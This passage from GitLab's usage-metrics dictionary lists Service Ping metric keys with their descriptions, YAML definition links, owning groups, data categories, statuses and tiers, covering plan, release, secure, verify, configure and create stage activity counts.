`usage_activity_by_stage.plan.projects_jira_dvcs_cloud_active` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181128_projects_jira_dvcs_cloud_active.yml) + +Group: `group::plan` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.plan.projects_jira_dvcs_server_active` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181130_projects_jira_dvcs_server_active.yml) + +Group: `group::plan` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.plan.service_desk_enabled_projects` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181122_service_desk_enabled_projects.yml) + +Group: `group::plan` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.plan.service_desk_issues` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181124_service_desk_issues.yml) + +Group: `group::plan` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.plan.todos` + +Count of users todos created + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181121_todos.yml) + +Group: `group::project management` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.release.deployments` + +Unique users triggering deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181926_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.release.failed_deployments` + +Total failed deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181928_failed_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.release.projects_mirrored_with_pipelines_enabled` + +Count creator_id from projects with repository mirroring enabled. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216181934_projects_mirrored_with_pipelines_enabled.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage.release.releases` + +Unique users creating release tags + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181930_releases.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.release.successful_deployments` + +Total successful deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181932_successful_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.secure.api_fuzzing_scans` + +Counts API fuzzing jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180353_api_fuzzing_scans.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: + +### `usage_activity_by_stage.secure.cluster_image_scanning_scans` + +Counts cluster image scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210618124854_cluster_image_scanning_scans.yml) + +Group: `group::container security` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.container_scanning_scans` + +Counts container scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175503_container_scanning_scans.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.coverage_fuzzing_scans` + +Counts fuzzing jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180352_coverage_fuzzing_scans.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: + +### `usage_activity_by_stage.secure.dast_scans` + +Counts dast jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182122_dast_scans.yml) + +Group: `group::dynamic analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.dependency_scanning_scans` + +Total number of users running Dependency Scanning Scans + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175220_dependency_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.sast_scans` + +Counts sast jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182120_sast_scans.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.secret_detection_scans` + +counts secret detection jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182123_secret_detection_scans.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_api_fuzzing_dnd_jobs` + +Count of API Fuzzing `docker-in-docker` jobs by job name + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180350_user_api_fuzzing_dnd_jobs.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.secure.user_api_fuzzing_jobs` + +Count of API Fuzzing jobs by job name + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180348_user_api_fuzzing_jobs.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.secure.user_api_fuzzing_scans` + +Number of users who have run a API Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607044126_user_api_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_container_scanning_jobs` + +Distinct count per user of Container Scanning jobs run + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175501_user_container_scanning_jobs.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_container_scanning_scans` + +Number of users who have run a Container Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043902_user_container_scanning_scans.yml) + +Group: `group::composition analysis` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_coverage_fuzzing_jobs` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216183514_user_coverage_fuzzing_jobs.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.secure.user_coverage_fuzzing_scans` + +Number of users who have run a Coverage Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607044040_user_coverage_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_dast_jobs` + +Count of DAST jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175614_user_dast_jobs.yml) + +Group: `group::dynamic analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.secure.user_dast_scans` + +Number of users who have run a DAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043109_user_dast_scans.yml) + +Group: `group::dynamic analysis` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_dependency_scanning_jobs` + +Total number of users running Dependency Scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175216_user_dependency_scanning_jobs.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_dependency_scanning_scans` + +Number of users who have run a Dependency Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043819_user_dependency_scanning_scans.yml) + +Group: `group::composition analysis` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_license_management_jobs` + +Total number of users running License Scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175218_user_license_management_jobs.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_preferences_group_overview_security_dashboard` + +Users who set personal preference to see Details on Group information page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216182207_user_preferences_group_overview_security_dashboard.yml) + +Group: `group::threat insights` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_sast_jobs` + +Count of SAST jobs per user + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182116_user_sast_jobs.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.secure.user_sast_scans` + +Number of users who have run a SAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043741_user_sast_scans.yml) + +Group: `group::static analysis` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_secret_detection_jobs` + +Count of Secret Detection Jobs per user + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182118_user_secret_detection_jobs.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.secure.user_secret_detection_scans` + +Number of users who have run a Secret Detection scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210607043957_user_secret_detection_scans.yml) + +Group: `group::static analysis` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage.secure.user_unique_users_all_secure_scanners` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181954_user_unique_users_all_secure_scanners.yml) + +Group: `group::secure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage.verify.ci_builds` + +Unique count of builds in project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175525_ci_builds.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.ci_external_pipelines` + +Total pipelines in external repositories + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175527_ci_external_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.ci_internal_pipelines` + +Total pipelines in GitLab repositories + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175529_ci_internal_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.ci_pipeline_config_auto_devops` + +Total pipelines from an Auto DevOps template + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175531_ci_pipeline_config_auto_devops.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.ci_pipeline_config_repository` + +Total Pipelines from templates in repository + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175533_ci_pipeline_config_repository.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.ci_pipeline_schedules` + +Pipeline schedules in GitLab + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175535_ci_pipeline_schedules.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.ci_pipelines` + +Distinct Users triggering Total pipelines + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175537_ci_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.ci_triggers` + +Total configured Triggers in project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216175539_ci_triggers.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.clusters_applications_runner` + +Count of users creating managed clusters with Runner enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216181949_clusters_applications_runner.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage.verify.projects_reporting_ci_cd_back_to_github` + +Projects with a GitHub service pipeline enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216175540_projects_reporting_ci_cd_back_to_github.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_applications_cert_managers` + +Total GitLab Managed clusters with Cert Manager enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175405_clusters_applications_cert_managers.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_applications_helm` + +Total GitLab Managed clusters with Helm enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175407_clusters_applications_helm.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_applications_ingress` + +Total GitLab Managed clusters with Ingress enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175409_clusters_applications_ingress.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_applications_knative` + +Total GitLab Managed clusters with Knative enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175411_clusters_applications_knative.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_disabled` + +Total GitLab Managed disabled clusters + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175415_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_enabled` + +Total GitLab Managed clusters currently enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175417_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_management_project` + +Number of Kubernetes clusters with clusters management project being set + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175413_clusters_management_project.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_platforms_eks` + +Total GitLab Managed clusters provisioned with GitLab on AWS EKS + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175420_clusters_platforms_eks.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_platforms_gke` + +Total GitLab Managed clusters provisioned with GitLab on GCE GKE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175419_clusters_platforms_gke.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.clusters_platforms_user` + +Total GitLab Managed clusters that are user provisioned + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175422_clusters_platforms_user.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.group_clusters_disabled` + +Total GitLab Managed disabled clusters attached to groups + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175428_group_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.group_clusters_enabled` + +Total GitLab Managed enabled clusters attached to groups + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175430_group_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.instance_clusters_disabled` + +Total GitLab Managed disabled clusters attached to the instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175424_instance_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.instance_clusters_enabled` + +Total GitLab Managed enabled clusters attached to the instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175426_instance_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.project_clusters_disabled` + +Total GitLab Managed disabled clusters attached to projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175432_project_clusters_disabled.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.project_clusters_enabled` + +Total GitLab Managed enabled clusters attached to projects + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175434_project_clusters_enabled.yml) + +Group: `group::configure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.projects_slack_notifications_active` + +Unique projects created in the past 28 days that have Slack notifications enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175436_projects_slack_notifications_active.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.projects_slack_slash_active` + +Unique projects created in the past 28 days that have Slack ‘/’ commands enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175437_projects_slack_slash_active.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.configure.projects_with_prometheus_alerts` + +Projects with Prometheus alerting enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180955_projects_with_prometheus_alerts.yml) + +Group: `group::monitor` + +Data Category: `Optional` + +Status: `removed` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_design_management` + +Monthly active users for design management + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180745_action_monthly_active_users_design_management.yml) + +Group: `group::product planning` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_git_write` + +Aggregated value for wiki, design, and project repo Git write actions + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182041_action_monthly_active_users_git_write.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_ide_edit` + +Number of unique users per month who edited a file from any web editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180327_action_monthly_active_users_ide_edit.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_project_repo` + +Count of monthly active users who have performed any Git operation (read/write/push) + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182040_action_monthly_active_users_project_repo.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_sfe_edit` + +Number of users using single file editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180321_action_monthly_active_users_sfe_edit.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_snippet_editor_edit` + +Number of users using the snippet editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180323_action_monthly_active_users_snippet_editor_edit.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_sse_edit` + +Number of users using the static site editor + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180325_action_monthly_active_users_sse_edit.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_web_ide_edit` + +Number of users editing using web IDE + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180319_action_monthly_active_users_web_ide_edit.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.action_monthly_active_users_wiki_repo` + +Unique monthly active users of the Wiki + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180747_action_monthly_active_users_wiki_repo.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.approval_project_rules` + +Total number of project approval rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182056_approval_project_rules.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.approval_project_rules_with_exact_required_approvers` + +Number of approval rules with the exact number of required approvers. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183622_approval_project_rules_with_exact_required_approvers.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.approval_project_rules_with_less_approvers_than_required` + +Number of approval rules with fewer approvers than required. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183620_approval_project_rules_with_less_approvers_than_required.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.approval_project_rules_with_more_approvers_than_required` + +Number of approval rules with more approvers than required. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183618_approval_project_rules_with_more_approvers_than_required.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.approval_project_rules_with_target_branch` + +Number of project approval rules scoped to a specific repo branch. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182058_approval_project_rules_with_target_branch.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.deploy_keys` + +Count of users creating deploy keys in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182034_deploy_keys.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.keys` + +Count of users creating regular keys in last 28 days. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182036_keys.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.merge_requests` + +Count of the number of users creating merge requests + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175055_merge_requests.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.merge_requests_users` + +Monthly count of the number of merge request users + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175101_merge_requests_users.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.merge_requests_with_added_rules` + +Merge requests with added rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175103_merge_requests_with_added_rules.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.merge_requests_with_optional_codeowners` + +Count of merge requests with optional codeowner approval rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175105_merge_requests_with_optional_codeowners.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.merge_requests_with_overridden_project_rules` + +Number of merge requests which have overriden rules created at the project level + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182047_merge_requests_with_overridden_project_rules.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.merge_requests_with_required_codeowners` + +Count of merge requests with required codeowner approval rules + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175107_merge_requests_with_required_codeowners.yml) + +Group: `group::source code` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.projects_enforcing_code_owner_approval` + +Count of total projects that require approval by code owners for code changes + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182043_projects_enforcing_code_owner_approval.yml) + +Group: `group::source code` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.create.projects_imported_from_github` + +Missing description + +[YAML 